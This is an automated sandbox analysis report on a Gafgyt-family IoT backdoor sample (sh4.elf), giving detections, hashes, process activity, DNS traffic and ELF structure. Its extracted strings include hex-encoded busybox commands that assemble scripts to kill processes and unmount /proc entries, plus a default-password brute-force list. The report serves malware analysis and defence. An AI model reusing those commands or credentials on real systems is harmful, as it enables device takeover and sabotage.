Linux Analysis Report
sh4.elf

Overview

General Information

Sample name: sh4.elf
Analysis ID: 1654340
MD5: 74a19f8d135f7132780ffddb8077d3fe
SHA1: 7a3b606151e7699617e1f40d121d72d308df9568
SHA256: 26b00fffb4dcfdf0e6531bc3409c6c14755cd8673c66036b202ac15bc51561d6
Tags: elf, user-abuse_ch

Detection

Score: 48
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

[Classification chart: category axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654340
Start date and time: 2025-04-02 09:52:53 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: sh4.elf
Detection: MAL
Classification: mal48.linELF@0/4@2/0
Command: /tmp/sh4.elf
PID: 5536
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output: For God so loved the world
Standard Error:

Process Tree:

  • system is lnxubuntu20
  • sh4.elf (PID: 5536, Parent: 5450, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.elf
    • sh4.elf New Fork (PID: 5540, Parent: 5536)
  • cleanup
No yara matches
No Suricata rule has matched


AV Detection

Source: sh4.elf; ReversingLabs: Detection: 33%
Source: /tmp/sh4.elf (PID: 5540); Socket: 127.0.0.1:22448
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sample; String containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample; String containing potential weak password found: 12345
Source: Initial sample; String containing potential weak password found: 54321
Source: Initial sample; String containing potential weak password found: 654321
Source: Initial sample; String containing potential weak password found: admin1234
Source: Initial sample; String containing potential weak password found: administrator
Source: Initial sample; String containing potential weak password found: supervisor
Source: Initial sample; String containing potential weak password found: password
Source: Initial sample; String containing potential weak password found: default
Source: Initial sample; String containing potential weak password found: guest
Source: Initial sample; String containing potential weak password found: service
Source: Initial sample; String containing potential weak password found: support
Source: ELF static info symbol of initial sample; .symtab present: no
Source: classification engine; Classification label: mal48.linELF@0/4@2/0
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/110/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/231/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/111/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/112/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/233/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/113/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/114/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/235/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/115/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1333/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1333/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1333/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/116/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1695/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1695/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1695/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/117/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/118/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/119/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/911/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/914/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3877/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3877/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3877/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/10/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/917/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/917/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/917/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/11/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/12/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/13/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/14/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/15/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/16/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/17/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/18/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/19/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1591/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1591/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1591/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/120/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/121/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1/maps
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/122/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/243/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/2/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/123/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/124/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1588/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1588/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1588/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/125/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/4/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/246/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/126/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/5/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/127/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/6/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1585/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1585/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1585/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/128/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/7/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/129/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/8/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/800/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/800/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/800/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/9/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/802/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/802/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/802/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/803/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/803/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/803/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/804/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/804/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/804/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/20/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/21/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3407/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3407/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/3407/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/22/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/23/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/24/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/25/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/26/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/27/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/28/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/29/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1484/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1484/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1484/maps
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/1484/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/490/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/490/fd
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/490/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/250/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/130/cmdline
Source: /tmp/sh4.elf (PID: 5536); File opened: /proc/251/cmdline
Source: /tmp/sh4.elf (PID: 5536); Queries kernel information via 'uname'
Source: sh4.elf, 5536.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp, sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp; Binary or memory string: B!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: exed the wor!/qemu-open.XXXXX
Source: sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp; Binary or memory string: vmware
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: /tmp/qemu-open.3xMUWP
Source: sh4.elf, 5536.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp, sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp; Binary or memory string: qemu-arm
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: /qemu-open.XXXXX
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: U/tmp/qemu-open.3xMUWP\
Source: sh4.elf, 5536.1.000055da058ce000.000055da0597d000.rw-.sdmp, sh4.elf, 5540.1.000055da058ce000.000055da0597d000.rw-.sdmp; Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.elf, 5536.1.000055da058ce000.000055da0597d000.rw-.sdmp, sh4.elf, 5540.1.000055da058ce000.000055da0597d000.rw-.sdmp; Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf
Source: sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp; Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
MITRE ATT&CK Matrix (two technique rows per tactic; a number in parentheses is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials
Resource Development: Acquire Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Path Interception; Boot or Logon Initialization Scripts
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
Defense Evasion: Direct Volume Access; Rootkit
Credential Access: OS Credential Dumping (1); Brute Force (1)
Discovery: Security Software Discovery (11); Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Impact: Abuse Accessibility Features; Network Denial of Service
No configs have been found
[Behavior graph (ID 1654340; sample sh4.elf; start date 02/04/2025; architecture LINUX; score 48): sh4.elf started and in turn started a second sh4.elf process; DNS/IP: daisy.ubuntu.com; signature: Multi AV Scanner detection for submitted file]

Source | Detection | Scanner | Label
sh4.elf | 33% | ReversingLabs | Linux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false | (none) | high
    No contacted IP infos
    No context
Match: daisy.ubuntu.com

Associated Sample Name / URL | Detection | Threat Name | Context
s-h.4-.Sakura.elf | malicious | Gafgyt, Mirai | 162.213.35.24
x-8.6-.Sakura.elf | malicious | Gafgyt, Mirai | 162.213.35.24
arm.elf | malicious | Mirai | 162.213.35.25
FBI.arm.elf | malicious | Gafgyt, Mirai | 162.213.35.24
FBI.sh4.elf | malicious | Gafgyt, Mirai | 162.213.35.24
FBI.arm7.elf | malicious | Gafgyt, Mirai | 162.213.35.25
FBI.mips.elf | malicious | Gafgyt, Mirai | 162.213.35.25
FBI.ppc.elf | malicious | Gafgyt, Mirai | 162.213.35.24
FBI.arm6.elf | malicious | Gafgyt, Mirai | 162.213.35.24
mpsl.elf | malicious | Unknown | 162.213.35.25
    No context
    No context
    No context
Process: /tmp/sh4.elf
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 13
Entropy (8bit): 3.5465935642949384
Encrypted: false
SSDEEP: 3:TgKYn:TgKYn
MD5: AEF4020327A62D78F5A8202D453B0A74
SHA1: 84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
SHA-256: 1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
SHA-512: 0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
Malicious: false
Reputation: moderate, very likely benign file
Preview: /tmp/sh4.elf.

Process: /tmp/sh4.elf
File Type: ASCII text
Category: dropped
Size (bytes): 360
Entropy (8bit): 3.8142074438312226
Encrypted: false
SSDEEP: 6:URJdFYgDF1SWdIwY/VUAaDF1S85qY/VKAvVVyAb/3hM/V+4D/VH:ITFtdKkNUaVIAbRMfF
MD5: 00433E10F7961F10768E16F6B913058B
SHA1: 0E45BC1C20A4AE2A57AA4147F13176B09615280D
SHA-256: 8FA99E554C95B73B085243C98A6E4A72EFE7E5BB1C53EE2EAD6B1467D30D4D38
SHA-512: 2E09BB11002E8F6CA0235538372C669798F286AFC8A4268913A1262DA0F26F817B6537C47742EF0B22F5CB001FE0C967B8B82D722035973D2803FFF067B0DCCF
Malicious: false
Reputation: low
Preview: 400000-415000 r-xp 00000000 fd:00 531606 /tmp/sh4.elf.425000-426000 rw-p 00015000 fd:00 531606 /tmp/sh4.elf.426000-42d000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].

Process: /tmp/sh4.elf
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 13
Entropy (8bit): 3.5465935642949384
Encrypted: false
SSDEEP: 3:TgKYn:TgKYn
MD5: AEF4020327A62D78F5A8202D453B0A74
SHA1: 84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
SHA-256: 1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
SHA-512: 0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
Malicious: false
Reputation: moderate, very likely benign file
Preview: /tmp/sh4.elf.

Process: /tmp/sh4.elf
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 13
Entropy (8bit): 3.5465935642949384
Encrypted: false
SSDEEP: 3:TgKYn:TgKYn
MD5: AEF4020327A62D78F5A8202D453B0A74
SHA1: 84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
SHA-256: 1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
SHA-512: 0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
Malicious: false
Reputation: moderate, very likely benign file
Preview: /tmp/sh4.elf.
File type: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), dynamically linked, stripped
Entropy (8bit): 6.888737595544536
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: sh4.elf
File size: 86'868 bytes
MD5: 74a19f8d135f7132780ffddb8077d3fe
SHA1: 7a3b606151e7699617e1f40d121d72d308df9568
SHA256: 26b00fffb4dcfdf0e6531bc3409c6c14755cd8673c66036b202ac15bc51561d6
SHA512: ec7eaac85e9174a0d845c7d197765e2e160ded12046c909d219a233c95c4f28749524183369aeae0a9f2b89b0332d33b3968714aaf5ba4b59455328462c334cb
SSDEEP: 1536:eko/xVM5PcnD+TM41i+cG9LH/oUNCrdTlnOVr:e1/M5PcDcHnr3ErdE
TLSH: DC838E72B8207D9ACC1925B6F070CA798F116AA140C21DB7ADEDF2744057E89F94EF6C
File Content Preview: .ELF..............*.......@.4....Q......4. ...(...............@...@..I...I...............P...PB..PB.....0H............................................././"O.n......#.*@........#.*@....&O.n.l..................................././.../.a"O.!...n...a.b("...q.

    ELF header

Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
Machine: <unknown>
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x4001a0
Flags: 0xc
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 3
Section Header Offset: 86468
Section Header Size: 40
Number of Section Headers: 10
Header String Table Index: 9

Section headers

Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
(none) | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | (none) | 0 | 0 | 0
.init | PROGBITS | 0x400094 | 0x94 | 0x2e | 0x0 | 0x6 | AX | 0 | 0 | 4
.text | PROGBITS | 0x4000e0 | 0xe0 | 0x12000 | 0x0 | 0x6 | AX | 0 | 0 | 32
.fini | PROGBITS | 0x4120e0 | 0x120e0 | 0x22 | 0x0 | 0x6 | AX | 0 | 0 | 4
.rodata | PROGBITS | 0x412104 | 0x12104 | 0x2884 | 0x0 | 0x2 | A | 0 | 0 | 4
.ctors | PROGBITS | 0x4250dc | 0x150dc | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x4250e4 | 0x150e4 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x4250f0 | 0x150f0 | 0x94 | 0x0 | 0x3 | WA | 0 | 0 | 4
.bss | NOBITS | 0x425184 | 0x15184 | 0x4788 | 0x0 | 0x3 | WA | 0 | 0 | 4
.shstrtab | STRTAB | 0x0 | 0x15184 | 0x3e | 0x0 | 0x0 | (none) | 0 | 0 | 1

Program headers

Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x400000 | 0x400000 | 0x14988 | 0x14988 | 6.9872 | 0x5 | R E | 0x10000 | (none) | .init .text .fini .rodata
LOAD | 0x150dc | 0x4250dc | 0x4250dc | 0xa8 | 0x4830 | 4.0814 | 0x6 | RW | 0x10000 | (none) | .ctors .dtors .data .bss
DYNAMIC | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | (none) | (none)

UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 09:53:49.804879904 CEST | 47674 | 53 | 192.168.2.15 | 1.1.1.1
Apr 2, 2025 09:53:49.804933071 CEST | 37139 | 53 | 192.168.2.15 | 1.1.1.1
Apr 2, 2025 09:53:49.903721094 CEST | 53 | 37139 | 1.1.1.1 | 192.168.2.15
Apr 2, 2025 09:53:49.974729061 CEST | 53 | 47674 | 1.1.1.1 | 192.168.2.15

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 2, 2025 09:53:49.804879904 CEST | 192.168.2.15 | 1.1.1.1 | 0xc3e6 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Apr 2, 2025 09:53:49.804933071 CEST | 192.168.2.15 | 1.1.1.1 | 0xc898 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 2, 2025 09:53:49.974729061 CEST | 1.1.1.1 | 192.168.2.15 | 0xc3e6 | No error (0) | daisy.ubuntu.com | (none) | 162.213.35.24 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 09:53:49.974729061 CEST | 1.1.1.1 | 192.168.2.15 | 0xc3e6 | No error (0) | daisy.ubuntu.com | (none) | 162.213.35.25 | A (IP address) | IN (0x0001) | false

    System Behavior

Start time (UTC): 07:53:46
Start date (UTC): 02/04/2025
Path: /tmp/sh4.elf
Arguments: -
File size: 4139976 bytes
MD5 hash: 8943e5f8f8c280467b4472c15ae93ba9